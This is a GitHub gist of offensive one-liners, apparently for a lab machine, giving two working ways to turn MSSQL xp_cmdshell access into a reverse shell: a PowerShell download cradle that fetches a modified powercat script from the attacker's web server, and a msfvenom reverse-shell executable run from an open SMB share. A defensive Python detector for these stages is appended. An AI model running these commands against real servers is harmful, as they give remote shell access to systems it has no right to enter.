@zer0trip
Forked from wshepherd0010/one_liners.md
Last active March 6, 2019 14:29
method 1 (preferred)

wget https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1

printf "powercat -c <KALI IP> -p 443 -ep\n" >> powercat.ps1

nohup python -m SimpleHTTPServer 80 &

nc -lvp 443 # from another tmux pane, not sure if it mattered...

function pwn(){ mssqlclient.py -debug -windows-auth mssql-svc:[email protected]; } # made it easier for me..

# you'll have to change the IP, but this just worked..
xp_cmdshell "powershell -exec bypass iex((new-object system.net.webclient).downloadstring(\"http://10.10.14.52:80/powercat.ps1\"))" 

method 2 (no PS ability)

msfvenom -p windows/shell_reverse_tcp LHOST=<KALI IP> LPORT=443 -f exe > shell.exe 

service smbd start && chmod -R 777 ../

net usershare add pwn `pwd` pwn everyone:F guest_ok=y

nohup nc -lvp 443 &

xp_cmdshell "cmd /c \\<KALI IP>\pwn\shell.exe"

fg 1
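Both methods above rely on the same server-side primitive: xp_cmdshell, first switched on with sp_configure and then used either to pull a script with a PowerShell download cradle (method 1) or to execute a binary from a remote SMB share via a UNC path (method 2). The following is an added detection example, not part of the gist; it runs over constructed records in the shape of a SQL Server audit or Extended Events export (timestamp, login, statement text) and flags exactly those three stages. The record layout and the sample statements are assumptions made for the example.

```python
import re

# Constructed sample records: (timestamp, login, statement text), in the shape of
# a SQL Server audit / Extended Events "sql_statement_completed" export.
# Statements 2-4 mirror the stages of the techniques described above.
SAMPLE_LOG = [
    ("2019-03-06T14:01:02Z", "mssql-svc", "SELECT name FROM sys.databases"),
    ("2019-03-06T14:02:10Z", "mssql-svc", "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"),
    ("2019-03-06T14:02:31Z", "mssql-svc",
     "xp_cmdshell 'powershell -exec bypass iex((new-object system.net.webclient)"
     ".downloadstring(\"http://10.10.14.52:80/powercat.ps1\"))'"),
    ("2019-03-06T14:05:40Z", "mssql-svc", "xp_cmdshell 'cmd /c \\\\10.10.14.52\\pwn\\shell.exe'"),
    ("2019-03-06T14:06:00Z", "reportuser", "SELECT TOP 10 * FROM sales"),
]

# Stage 1: xp_cmdshell being enabled (it is off by default on SQL Server).
ENABLE_RE = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)
# Stage 2: any xp_cmdshell invocation at all.
XP_RE = re.compile(r"\bxp_cmdshell\b", re.I)
# Method 1 indicator: PowerShell download-cradle / execution-policy-bypass tokens.
CRADLE_RE = re.compile(
    r"downloadstring|invoke-expression|\biex\b|-exec\s+bypass|-enc(odedcommand)?\b", re.I)
# Method 2 indicator: execution of a file from a UNC path (\\host\share\...).
UNC_RE = re.compile(r"\\\\[\w.\-]+\\[\w$]+")


def classify(statement):
    """Return the list of reasons a single SQL statement is suspicious (empty if none)."""
    reasons = []
    if ENABLE_RE.search(statement):
        reasons.append("xp_cmdshell enabled via sp_configure")
    elif XP_RE.search(statement):
        reasons.append("xp_cmdshell invocation")
        if CRADLE_RE.search(statement):
            reasons.append("PowerShell download cradle")
        if UNC_RE.search(statement):
            reasons.append("execution from remote SMB share (UNC path)")
    return reasons


def severity(reasons):
    """Map reasons to a severity: shell command with cradle/UNC > enabling > bare use."""
    if not reasons:
        return None
    if any(r.startswith(("PowerShell", "execution from")) for r in reasons):
        return "critical"
    if reasons[0].startswith("xp_cmdshell enabled"):
        return "high"
    return "medium"


def analyze(records):
    """Run classify() over every record and return one finding dict per suspicious statement."""
    findings = []
    for ts, login, statement in records:
        reasons = classify(statement)
        if reasons:
            findings.append({"ts": ts, "login": login, "severity": severity(reasons),
                             "reasons": reasons, "statement": statement})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['ts']} {f['login']:<10} {f['severity']:<8} {'; '.join(f['reasons'])}")
```

On a real instance the same logic can be fed from a SQL Server Audit or an Extended Events session capturing sql_statement_completed; a sp_configure change for xp_cmdshell followed within minutes by an xp_cmdshell call containing a cradle or a UNC path, as in the constructed sample, is the sequence worth alerting on, and the current state of the option is visible with `EXEC sp_configure 'xp_cmdshell'` once advanced options are shown.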